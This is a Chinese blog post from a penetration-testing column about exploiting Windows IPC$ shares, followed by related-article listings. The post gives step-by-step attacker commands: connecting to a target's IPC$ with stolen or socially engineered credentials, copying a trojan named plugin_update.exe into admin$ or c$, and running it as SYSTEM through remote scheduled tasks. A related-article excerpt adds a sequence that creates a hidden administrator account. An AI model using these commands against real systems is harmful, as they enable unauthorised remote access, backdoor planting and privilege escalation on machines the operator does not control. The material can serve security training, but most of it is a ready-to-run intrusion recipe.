IPC$漏洞利用简介

最新推荐文章于 2024-05-21 22:54:12 发布
最新推荐文章于 2024-05-21 22:54:12 发布
阅读量3k 收藏 44
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YUKIDDDD/article/details/119334500
版权

IPC$漏洞利用简介

1.关于Windows操作系统中的“共享”

在Windows操作系统中的共享有3类:普通共享、默认共享、IPC$共享,

  1. 普通共享:就是通常意义上的共享,即用户设置的共享目录、共享文件夹、共享分区等;

  2. 默认共享:Windows操作系统的隐含驱动器共享,通常有:

    (1)驱动器共享:如C$D$,开启后可直接访问分区中资源;

    (2)系统管理共享admin$:通常指向C:\Windows

  3. IPC$共享:这实际不是共享,而是提供一种访问管道;IPC全称“Internet Process Connection”,顾名思义,是为了进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

查看服务器所开放的共享,可使用命令:net share

2. 利用条件

  1. 开放了139、445端口;
  2. 目标开启ipc$文件共享;
  3. 获取用户账号密码。

3.IPC连接建立与攻击尝试

  1. 首先,目标服务器上必须启用了IPC$,启用命令: net share IPC$
    当然,目标服务器上启用的共享对入侵者而言,多多益善。

P.S. 删除IPC$命令:net share IPC$ /del

  1. 在入侵者侧,首先须建立与目标服务的IPC管道连接,建立连接命令如下:
net use \\目标服务器IP地址\IPC$ "口令" /user:用户名

P.S. 如口令、用户名为空,则建立了所谓“空连接”,这种连接权限有限,仅为everyone级权限;因此,建议在通过社会工程等手段获取用户、口令后再尝试。

  1. 建立连接后,用net share \\目标服务器IP地址查看目标服务器所开放的共享资源,也可以直接尝试上传或访问某个共享(例如:admin$)、确认是否有可以利用的资源或信息;

  2. 尝试攻击:将木马或其他工具上传至目标服务器的共享目录,比如:

copy 工具.exe \\目标服务器\admin$

然后直接或定时(利用at命令)运行工具.exe,完成攻击。接建立与攻击尝试

# 查看目标机器时间
net time \\193.168.1.12
# 创建该时间之后的某个时刻自动执行任务,任务名 plugin_update
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 如果不想等,可以立即运行后门程序
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 删除创建的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

5.常用命令

# 1.连接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看连接情况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户(自己本机也需开启)
nbtstat -A 193.168.1.12
# 6.删除连接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe   
(上传到目标的:c\windows\temp\目录下)
copy \\127.0.0.1\c$\test.exe c:\
(下载到本地c盘下)
# 8.创建计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
YUKIDDDD
关注
  • 1
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 四十三.恶意样本原理及远程服务器IPC$安全缺陷解析
杨秀璋的专栏
01-30 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了DNS欺骗(DNS投毒)及钓鱼网站原理知识,并通过Ettercap工具复现某购物网站的钓鱼漏洞。本文将详细讲解木马原理知识,并通过远程服务器IPC $ 漏洞实现木马植入及控制远程服务器。希望这篇基础文章对您有所帮助,更希望大家提高安全意识,学会相关防范,也欢迎大家讨论。
IPC$命令详解
weixin_33758863的博客
05-14 383
IPC$命令详解: 网上关于ipc$***的文章可谓多如牛毛,而且也不乏优秀之作,***步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这...
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1127
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
IPC$横向移动
最新发布
Y22Lee的博客
05-21 953
IPC( Internet Process Connection)共享,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。共享文件文件共享是指主动地在网络上共享自己的计算机文件。
ipc$漏洞攻击(实验)
2301_76361674的博客
05-10 2023
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。5.然后,我们物理连接到靶机上,到了两分钟后,我们可以用命令看到,这个pp45的用户就出现了。
信息安全 漏洞利用
yidao0819的博客
05-22 560
实验目的 1、了解IPC$漏洞原理 2、掌握几个相关net 命令的用法 3、掌握PCshare生成远程控制程序工具的使用 实验原理 实验参考步骤: 1、确认目标的IPC$默认共享已经打开。 2、在本地利用net use与远程目标建立IPC$连接通道、 3、将目标的C盘映射为本地Z盘。 (至此,说明已成功入侵并控制对方C盘,继续进行可更方便地实现全方位的远程控制) 4、利用PCshare工具实现远程控制。 5、尝试获得远程主机的 Shell、用户列表、开启的服务列表、开放的端口列表等
进程和进程通信(IPC)类型-面试准备(一)
u014652631的博客
07-25 222
首先简单谈一下什么是进程? 答:进程是装入内存运行的程序段,是许多的系统对象拥有权的集合,换句大家经常引用的话说进程是资源分配的基本单位。 举例来说,我们的浏览器程序存放在C盘的某个位置,这时它只是硬盘上的程序。每次我们打开一个浏览器的时候,这个程序就会被装入内存中去,进行一系列初始化(进程控制块PCB的初始化,包括进程计数器,进程状态,CPU命令,寄存器等等)。此时我们看到了浏览器打开并显示...
ipc$漏洞利用实例
dieman0446的博客
07-26 1354
一、什么是IPC$ IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道, 通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换, 从而实现对远程计算机的访问。 二、如何发现系统是否存在该漏洞 本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现I...
学习笔记-IPC$(Internet Process Connection)
人饭子的博客
11-05 1515
IPC$(Internet Process Connection) IPC$ 的概念 IPC$(Internet Process Connection) 是共享 "命名管道" 的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限, 在远程管理计算机和查看计算机的共享资源时使用。 利用 IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主...
03IPC$入侵--空连接漏洞知识.pdf
01-30
IPC$入侵是指攻击者利用 IPC$ 空连接漏洞来与目标主机建立连接,获取目标主机的一些关键信息,从而可能对目标主机造成一定的安全威胁。 IPC$空连接漏洞是指在 Windows 操作系统中,客户机可以使用空用户名和空密码...
IPC$共享原理分析
12-15
然而,IPC$共享也存在一些安全隐患,因为一些不法人士可以利用这个功能来访问共享资源、导出用户列表、并使用一些字典工具进行密码探测,从而达到不可告人的目的。 IPC$共享的工作原理是基于命名管道的资源共享。...
IPC.exe 网络摄像头调试软件
09-20
IPC.exe 网络摄像头调试软件
2002-2006年系统经典利用漏洞ipc$
01-22
2002-2006年系统经典利用漏洞ipc$ 2. 实例演示-完整入侵过程 (1)纯DOS命令式 入侵 首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有 漏洞的计算机IP net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码 net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。 net use --------查看是否成功连接 net time \\192.168.38.129 ----查看对方电脑时间 at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123 at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限 copy 拖进来\\192.168.38.129\c$ net time \\192.168.38.129 ----再次查看对方电脑时间 at \\192.168.38.129 时间 regedit /s c:\1.reg 或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$ at \\192.168.38.129 时间 c:\1.bat 等待对方电脑重启,再连连接3389。 (2)利用开启telnet工具 (3)利用远控工具
Ipc漏洞简单攻击.
03-14
**Ipc漏洞简单攻击** 在信息技术领域,Ipc(Inter-...而"06 Ipc漏洞简单攻击.wmv"这个视频文件很可能详细解释了如何发现和利用此类漏洞,以及演示了一些基本的防御策略,对于学习和研究Ipc漏洞有很高的参考价值。
批处理大观 IPC$入侵bat telnetbat 开机后台运行 等
06-14
IPC$入侵通常涉及寻找系统漏洞、弱密码策略或利用已知的安全漏洞来获得对目标系统的未授权访问。防范IPC$入侵的关键在于加强系统的安全设置,如禁用不必要的网络服务、更新系统补丁、设置强密码等。 接下来是...
IPC$的使用和利用方法
qq_42025840的博客
06-04 3342
一、简介: IPC共享命名的管道资源,为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获得相应的去权限,远程管理计算机和检查计算机的共享资源时使用的 二、相关基本命令: 1、建立空连接: net use \\IP\ipc$ "" /user:"" 2、建立非空连接: net use \\IP\ipc$ "密码" /user:" 用户名" 3、...
Windows中IPC$服务及利用
2ed
11-13 4371
IPC$(Internet Process Connection) 共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...
IPC(一)利用纯Binder通信(非aidl)
IZZY
03-25 1386
在Android中,当两个类都在同一个进程里执行时,两者之间的沟通,只要采取一般的函数调用(Function Call)就行了,既快速又方便。一旦两个类分别在不同的进程里执行时,两者之间的沟通,就不能采取一般的函数调用途径了。只好采取IPC沟通途径。Android框架的IPC沟通仰赖单一的IBinder接口。此时Client端调用IBinder接口的transact()函数,透过IPC机制而调用到远
ipc$详细解释大全
是叶子终要回归大地,是爱情总会沉入海底。
02-07 995
一 前言        网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。      不 过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack 论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些
建立ipc$连接的命令
12-16
建立IPC$连接的命令可以通过使用命令行工具来完成。在Windows操作系统中,可以使用以下命令来建立IPC$连接: 1. 打开命令提示符窗口(CMD)。 2. 输入以下命令并按下回车键: ```bash net use \\目标计算机的IP地址\ipc$ /u:用户名 密码 ``` 其中,"目标计算机的IP地址"是要建立IPC$连接的计算机的IP地址;"用户名"和"密码"是连接到目标计算机所需的凭据。 注意:要成功建立IPC$连接,你需要在目标计算机上拥有正确的用户名和密码。 3. 如果输入的凭据正确且目标计算机上的IPC$共享可用,命令行提示将显示"命令成功完成"的消息,表示IPC$连接已建立。 建立IPC$连接可以让你在网络上访问目标计算机的IPC资源,从而进行文件共享、远程管理和远程命令执行等操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值